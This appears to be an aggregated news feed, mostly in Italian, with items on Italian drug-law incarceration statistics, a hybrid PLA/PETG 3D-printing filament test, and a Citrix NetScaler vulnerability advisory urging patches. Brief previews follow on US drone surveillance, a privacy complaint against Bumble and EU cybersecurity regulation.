A 35 anni dall’entrata in vigore del Testo Unico sulle droghe 309/90 e 16 di pubblicazione del Libro Bianco sulle droghe, i dati purtroppo confermano una tendenza al peggioramento. Gli effetti penali, in particolare dell’art. 73, sono sempre più devastanti e creano sovraffollamento carcerario confermando che la Legge Jervolino-Vassalli resta il principale veicolo di ingresso nel circuito penale in Italia.

Continuano a salire in termini assoluti, +4,9%, gli ingressi in carcere per reati connessi alle droghe: 11.220 delle 43.489 detenzione nel 2024 sono state causate dall’art. 73 del Testo unico, per detenzione a fini di spaccio – il 25,8% degli ingressi (nel 2023 era il 26,3%).

Le presenze in carcere sono 62.715 a metà giugno. Di questi 13.354 a causa del solo art. 73 del Testo unico. Altre 6.732 in combinato con l’art. 74 (associazione finalizzata al traffico illecito di sostanze stupefacenti o psicotrope), solo 997 esclusivamente per l’art. 74. Complessivamente il 34,1% del totale. Sostanzialmente il doppio della media europea (18%) e molto di più di quella mondiale (22%).

Spropositati gli ingressi e le presenze di detenuti definiti “tossicodipendenti”: è dichiarato così il 38,8% di chi entra in carcere, mentre al 31/12/2024 erano presenti nelle carceri italiane 19.755 detenuti “certificati” il 31,9% del totale. Non erano mai stati così tanti dal 2006 (anno dell’entrata in vigore della legge Fini-Giovanardi) ad oggi.

➡ Le conseguenze sulla Giustizia


Le associazioni della Società civile denunciano che continuano a esser negati i dati, pur pubblici, sui procedimenti in corso, per cui i dati sono fermi al 2023 che raccontano un paese in cui sono aperti quasi 120.000 fascicoli per procedimenti penali per droghe: per violazione dell’articolo 73 e 74 rispettivamente 170.292 e 45.285.

➡ Le misure alternative


Continua l’allargamento della sfera penale che supera quota 150.000, con la costante crescita delle misure alternative, che sono in realtà una alternativa alla libertà invece che alla detenzione. In un contesto di forte domanda di controllo sociale istituzionale, gli strumenti di diversion e quelli di probation consentono di ampliare l’area del controllo, invece che limitare quello coattivo-penitenziario. Ne è segno il fatto che oltre ai quasi 62.000 detenuti al 31/12/2023 erano in carico per misure alternative e sanzioni di comunità (Messa alla Prova) ulteriori 93.475 soggetti, quasi 10.000 in più rispetto al 2023 (+11,6%).

➡ Le segnalazioni e le sanzioni amministrative per il consumo di droghe illegali


Nel 2024 sono registrate 36.960 segnalazioni. Di queste circa il 38% finisce con una sanzione amministrativa (12.353), le più comuni la sospensione della patente (o il divieto di conseguirla) e del passaporto. Questo anche in assenza di un qualsiasi comportamento pericoloso messo in atto dalla persona sanzionata. La repressione continua ad abbattersi sui minori, che confermano i numeri del 2023, in attesa del loro consolidamento: 3.722 adolescenti che entrano in un percorso sanzionatorio stigmatizzante (cioè desocializzante) e controproducente. La quasi totalità dei minori, il 97,7%, è segnalato per cannabis. Risulta irrilevante la vocazione “terapeutica” della segnalazione al Prefetto: solo 410 persone sono state sollecitate a presentare un programma di trattamento socio-sanitario; nel 2007 erano 3.008. Anche gli inviti a presentarsi al SERD continuano a diminuire (3.792). La repressione colpisce principalmente persone che usano cannabis (77,4%), seguono a distanza cocaina (15,8%) ed eroina (2,8%) e, in maniera irrilevante, le altre sostanze. Dal 1990 1.463.442 persone sono state segnalate per possesso di droghe per uso personale, 1.074.754 di queste per derivati della cannabis.

Le associazioni che producono il Libro Bianco hanno convocato una contro-confereza sulle droghe il secondo finesettimana di novembre in concomitanza con la VII Conferenza sulle dipendenze indetta dal Governo.

L'articolo E’ stato presentato il XVI Libro Bianco sulle Droghe di cui l’Associazione Luca Coscioni è co-sponsor proviene da Associazione Luca Coscioni.



PLA With PETG Core Filament Put to the Test



The Stronghero 3D hybrid PLA PETG filament, with visible PETG core. (Credit: My Tech Fun, YouTube)The Stronghero 3D hybrid PLA PETG filament, with visible PETG core. (Credit: My Tech Fun, YouTube)
Sometimes you see an FDM filament pop up that makes you do a triple-take because it doesn’t seem to make a lot of sense. This is the case with a hybrid PLA/PETG filament by Stronghero 3D that features a PETG core. This filament also intrigued [Dr. Igor Gaspar] who imported a spool from the US to have a poke at it to see why you’d want to combine these two filament materials.

According to the manufacturer, the PLA outside makes up 60% of the filament, with the rest being the PETG core. The PLA is supposed to shield the PETG from moisture, while adding more strength and weather resistance to the PLA after printing. Another interesting aspect is the multi-color look that this creates, and which [Igor]’s prints totally show. Finding the right temperatures for the bed and extruder was a challenge and took multiple tries with the Bambu Lab P1P including bed adhesion troubles.

As for the actual properties of this filament, the layer adhesion test showed it to be significantly worse than plain PLA or PETG when printed at extruder temperatures from 225 °C to 245 °C. When the shear stress is put on the material instead of the layer adhesion, the results are much better, while torque resistance is better than plain PETG. This is a pattern that repeats across impact and other tests, with PETG more brittle. Thermal deformation temperature is, unsurprisingly, between both materials, making this filament mostly a curiosity unless its properties work much better for your use case than a non-hybrid filament.

youtube.com/embed/PnMUxLlnPSA?…


hackaday.com/2025/06/26/pla-wi…



Citrix: nuova vulnerabilità critica da 9,2 colpisce NetScaler – attacchi in corso!


Citrix ha segnalato una nuova vulnerabilità critica nelle sue appliance NetScaler, già attivamente sfruttata dagli aggressori. Il problema è identificato con l’identificativo CVE-2025-6543 e riguarda le diffuse soluzioni NetScaler ADC e NetScaler Gateway utilizzate dalle aziende per l’accesso remoto e la protezione del perimetro di rete.

Come riportato nella nota ufficiale di Citrix, exploit per questa vulnerabilità sono già stati osservati in attacchi reali. CVE-2025-6543 (punteggio CVSS: 9,2) consente l’invio di una richiesta speciale da remoto e senza autenticazione, causando il malfunzionamento e l’indisponibilità del dispositivo. In particolare, si tratta di un completo disservizio che può paralizzare il funzionamento dell’infrastruttura aziendale.

La vulnerabilità interessa le versioni di NetScaler ADC e Gateway

  • NetScaler ADC and NetScaler Gateway 14.1 BEFORE 14.1-47.46
  • NetScaler ADC and NetScaler Gateway 13.1 BEFORE 13.1-59.19
  • NetScaler ADC 13.1-FIPS and NDcPP BEFORE 13.1-37.236-FIPS and NDcPP

Sono interessati solo i dispositivi configurati come gateway, inclusi server VPN, proxy di applicazioni ICA, VPN clientless (CVPN), proxy desktop remoto e server di autenticazione virtuale (AAA).

Citrix ha già rilasciato patch per risolvere la vulnerabilità CVE-2025-6543 (monitorata internamente come CTX694788 ). Gli aggiornamenti sono disponibili per tutte le versioni interessate di NetScaler. L’azienda consiglia vivamente agli amministratori di installare questi aggiornamenti il ​​prima possibile e di rivedere le configurazioni dei dispositivi.

La comparsa di CVE-2025-6543 coincide con un altro problema nei prodotti Citrix, denominato ufficiosamente CitrixBleed 2 e identificato come CVE-2025-5777. Questa vulnerabilità consente agli aggressori di dirottare le sessioni utente attive estraendo token di autenticazione dalla memoria del dispositivo. Questa tecnica era già stata utilizzata dagli hacker criminali nel 2023, quando una vulnerabilità simile, chiamata CitrixBleed, fu sfruttata per attaccare il settore pubblico e grandi aziende, inclusi casi con successiva diffusione sulle reti interne.

Gli esperti sottolineano che entrambe le vulnerabilità sono critiche e richiedono un intervento immediato da parte dei reparti IT. Oltre a installare le patch, si consiglia di monitorare attivamente il comportamento dei dispositivi di rete, controllare le sessioni utente attive e rafforzare le policy di accesso.

Citrix non ha ancora fornito ulteriori chiarimenti sui dettagli dello sfruttamento di CVE-2025-6543.

L'articolo Citrix: nuova vulnerabilità critica da 9,2 colpisce NetScaler – attacchi in corso! proviene da il blog della sicurezza informatica.



Le attività di intelligence anti-Iran con i droni USA di Sigonella


@Notizie dall'Italia e dal mondo
Dopo i raid sui siti nucleari iraniani, i droni-spia USA decollano da Sigonella e sorvolano il Golfo Persico e il Mediterraneo: la sorveglianza aerea americana si intensifica nei cieli più caldi del mondo.
L'articolo Le attività di intelligence anti-Iran con i droni USA di



La ONG per la privacy di Schrems presenta una denuncia contro la funzione di IA dell’app di incontri Bumble

L'articolo proviene da #Euractiv Italia ed è stato ricondiviso sulla comunità Lemmy @Intelligenza Artificiale
Giovedì Noyb, la ONG sulla privacy di Max Schrems, ha presentato un reclamo alle autorità austriache contro

Intelligenza Artificiale reshared this.



Cyberwarfare iraniano: oltre il nucleare, una potenza nascosta in espansione


@Informatica (Italy e non Italy 😁)
Negli ultimi anni, l'Iran ha costruito in silenzio un arsenale digitale avanzato, ideale per condurre una cyberwarfare come strumento di pressione politica e di ritorsione contro Stati che percepisce come ostili o che supportano i suoi oppositori interni. Ora è

reshared this



NIS2 e DORA: la gestione delle terze parti in sicurezza, fra conformità e buone pratiche


@Informatica (Italy e non Italy 😁)
Dall’introduzione di NIS2 e DORA, il livello di resilienza delle aziende deve essere alzato e se fino a qualche tempo fa le imprese fornitrici piccole, medie e grandi potevano provare a rimandare la “cura della loro cyber sicurezza”,